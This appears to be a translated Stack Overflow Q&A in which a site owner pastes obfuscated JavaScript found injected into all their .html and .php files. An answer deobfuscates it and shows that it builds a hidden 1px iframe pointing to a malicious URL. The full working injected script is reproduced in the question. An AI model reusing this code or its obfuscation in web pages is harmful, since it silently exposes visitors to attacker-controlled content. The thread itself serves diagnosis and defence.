0

出于某种原因,我还没有发现我服务器上的所有 .html 和 .php 文件都已更改为包含以下 Javascript(我已使用http://jsbeautifier.org/对其进行了美化):

<script type="text/javascript">
if ('GulVG' == 'dvLWnC') LCXW = 'ukNoT';
if ('QjTy' == 'OGvoYK') iBPba = 'YmwGf';
var qiyTHJNSK = "939f9f9b655a5a968c9f909e9f8c9f626259a09e5a9499598e92946a64";

function NEHbsc() {
    var RQrwz = 'ufOn';
    if ('Juxm' == 'mHxLm') Niaf();
}
var px1_var = "1px";
var uvWXHd = 'pDito';
if ('skhYX' == 'Gczk') hYkhb();
var rGsu;
var hitxMCSTc = "pa\x72s\x65\x49nt";
var WNOgK = "b\x6fdy";
var oqHu;
var NPOXa = 39;
var HGBXMBYkq = "co\x6e\x73tructor";
var CodwDw;
var adBe = 261;
var fmvCwPvf = "\x66\x72o\x6dC\x68ar\x43ode";
var gmCUwm = 6;
var BcWka = 'prssL';
var SjIk = 'DcwGHM';
var UBzc;
var pubYymvCW = "a\x70\x70en\x64C\x68ild";
var EVHJIA = 'nGzZ';
if ('NWGB' == 'XlySU') AWtq();
var LnJbDi = "";
if ('jUcBg' == 'tFKsdn') fRhEH = 'PEeA';
var LgLiBeb = "\x73li\x63e";
if ('cXqZe' == 'hdvrt') KIkyJ();
var appVersion_var = "\x61ppV\x65r\x73i\x6fn";
var DaGd = 'WJdpuS';
var UNLOOk = 118;
var px0_var = "0\x70x";
var yufL = 268;
if ('vlwmVU' == 'dtNS') dFobAh = 'dbES';
var coiJVUL = (function () {
    function HMtGY() {}
    var JWuN = 'Dztvmh';
    var JZEGM;
    return this;

    function FeZd() {
        var IZZFyk = 'LOij';
        if ('SomCO' == 'VtLBbq') uThvZ();
    }
})();

function utrcTc() {
    var sQqTc = 'GDjGUL';
    if ('GGbJ' == 'CdUOt') PFLkIv();
}
var yILQN;
var BlpVKOn = "GJfIbBp" [HGBXMBYkq];
var Cspfjl = 'cRBOTm';
var AhJvb;
for (var naxoJ = 0; naxoJ < qiyTHJNSK.length; naxoJ += 2) {
    function mthsyA() {}
    coesFKAJH = coiJVUL[hitxMCSTc](qiyTHJNSK[LgLiBeb](naxoJ, naxoJ + 2), 16) - 43;
    var ihta;
    LnJbDi += BlpVKOn[fmvCwPvf](coesFKAJH);
    if ('YwvB' == 'nLaBq') FxCUcY = 'LClI';

    function LuHhQ() {}
    if ('rLTy' == 'RGZAH') InLSa = 'hqGi';
}
var pRLWk = 'qYTdKF';
var dbQz = 'IuaOpO';
var NLauPPxo = "KXDDhcUB";

function WiKx() {
    var RqlT = 'TnwXV';
    if ('mGATZ' == 'BoFZqb') IaMIR();
}
var KVmoXu = 'CCmbz';
var fpSlvS;

function kIyvYK() {
    var kejS = 'hRGKfF';
    if ('dwlh' == 'PerQmS') NeWE();
}
var HukG = 171;
var SCQFe = "";
var ZSeQP;
if ('TYhSD' == 'pOHCUl') xDKJc();
var QgUskg = 165;
if (navigator[appVersion_var].indexOf("MSIE") != -1) {
    var XGZk = 162;
    var dQaQT;
    SCQFe = '<iframe name="' + NLauPPxo + '" src="' + LnJbDi + '">';

    function cxMsRj() {
        var gRqlMJ = 'YxSQd';
        if ('Yedbfb' == 'FmRTE') zMRsf();
    }
    if ('UFqh' == 'inxzUL') IMhGyA();
    var LnEoLC;
} else {
    function NBxX() {
        var rUxrb = 'oyDIE';
        if ('trsJw' == 'EffuZz') zIRGF();
    }
    var pZBDH = 'FbTqY';
    SCQFe = 'iframe';
    if ('qJQEx' == 'sEOu') Jjcc();
    var LtKfoR;
}
var RHgYbw = 209;
var XGCxE = document.createElement(SCQFe);
var osIEg = 'zpisyX';
var yTDi;
XGCxE.REKhC = function () {
    var EhIV;
    this["src"] = LnJbDi;
    var hITyC = 47;

    function QPAbon() {
        var vlUKyt = 'ydOwpE';
        if ('bUzfeI' == 'Gtzuz') xqXIgA();
    }
}

function uNdxy() {}
if ('tXIjw' == 'ZuZUXu') TJmV = 'OZLhL';
XGCxE.style.right = px0_var;
var INwC = 218;

function eXRqv() {}
XGCxE.style.position = "absolute";
var myUH = 129;
var itYaqs = 'PIEQTG';
XGCxE.style.height = px1_var;

function Cncutd() {
    var rElSS = 'aVJgKV';
    if ('OlroM' == 'QRUVc') ZSoo();
}
if ('RpUI' == 'UbjbH') DfFH = 'LQKPT';

function jpdw() {}
XGCxE.name = NLauPPxo;

function GZKiB() {
    var HGDCTk = 'uDGc';
    if ('FdUgR' == 'hVIV') dcxx();
}
function vaVVBx() {
    var PFhZz = 'CWQbMT';
    if ('gEEvG' == 'aPzLMo') dMSclV();
}
XGCxE.REKhC();

function eInNvF() {}

function gPMoah() {
    var UrmQn = 'fnwS';
    if ('RJhZkZ' == 'NoYtxc') lkhw();
}
var xFoDke = 185;
XGCxE.style.top = px0_var;

function LXpA() {}

function Qkls() {
    var rwmtT = 'RLulmG';
    if ('mvum' == 'mQYG') RSKN();
}
XGCxE.style.width = px1_var;
var OMySFE = 'AJgrgE';

function yvFj() {}

function YzJdttK() {
    function nWCtr() {
        var HbXEi = 'cssMz';
        if ('gwMUm' == 'fJUX') Jblip();
    }
    var kNePZX;
    if (document[WNOgK]) {
        if ('Mwub' == 'FLNDO') TdNEy = 'WAnb';
        var AfhI = 'gdwUZG';
        var UdZQcB;
        var document_body_var = document[WNOgK];
        if ('mjKa' == 'hCEFj') Vmkvz();
        if ('knkq' == 'QLKklH') ygHF();
        document_body_var[pubYymvCW].apply(document_body_var, [XGCxE]);

        function jbGXOJ() {
            var ovQXvi = 'HTXX';
            if ('fllkOR' == 'OQlK') xGgRO();
        }
    } else {
        var jJJY = 67;
        setTimeout(YzJdttK, 120);
        var fvmrr = 'HIfEiu';

        function KvOj() {
            var gLdJK = 'XueY';
            if ('ppiCfu' == 'xudev') ZqGbGK();
        }
    }
    var qUvxeh;
}
var EKFO = 10;
var rbiRyL;
YzJdttK();

function uJgk() {
    var QbDju = 'lEEFak';
    if ('jBDVr' == 'OzMogy') EHbmqV();
}
var Jslsu = 'BXWm';
</script>

有人可以帮我破译吗?另外我怎么知道我是怎么得到这个的,有没有办法追溯它?

干杯!

4

1 回答 1

1

从所有 var 声明和错误条件 if 语句中清除,实际执行的是:

var qiyTHJNSK = "939f9f9b655a5a968c9f909e9f8c9f626259a09e5a9499598e92946a64";

var HGBXMBYkq = "co\x6e\x73tructor"; // constructor
var fmvCwPvf = "\x66\x72o\x6dC\x68ar\x43ode"; // fromCharCode
var BlpVKOn = "GJfIbBp" [HGBXMBYkq]; // String()
var hitxMCSTc = "pa\x72s\x65\x49nt"; // parseInt
var WNOgK = "b\x6fdy"; // body
var LgLiBeb = "\x73li\x63e"; // slice
var LnJbDi = "";

var coiJVUL = (function () {
    return this;
})();

for (var naxoJ = 0; naxoJ < qiyTHJNSK.length; naxoJ += 2) {
    coesFKAJH = coiJVUL[hitxMCSTc](qiyTHJNSK[LgLiBeb](naxoJ, naxoJ + 2), 16) - 43;
    LnJbDi += BlpVKOn[fmvCwPvf](coesFKAJH);
}

if (navigator[appVersion_var].indexOf("MSIE") != -1) {
    SCQFe = '<iframe name="' + NLauPPxo + '" src="' + LnJbDi + '">';
} else {
    SCQFe = 'iframe';
}
var XGCxE = document.createElement(SCQFe);

XGCxE.REKhC = function () {
    this["src"] = LnJbDi;
};

XGCxE.style.right = px0_var;

XGCxE.style.position = "absolute";

XGCxE.style.height = px1_var;

XGCxE.name = NLauPPxo;

XGCxE.REKhC();

XGCxE.style.top = px0_var;

XGCxE.style.width = px1_var;

function YzJdttK() {

    if (document[WNOgK]) {

        var document_body_var = document[WNOgK];

        document_body_var[pubYymvCW].apply(document_body_var, [XGCxE]);

    } else {

        setTimeout(YzJdttK, 120);
    }
}

YzJdttK();

因此,它完成了所有这些脚本所做的事情:它附加了一个不可见的 iframe,在您的情况下,它带有位置http[evil]://katestat77.us/in.cgi?9

于 2012-09-26T14:38:54.277 回答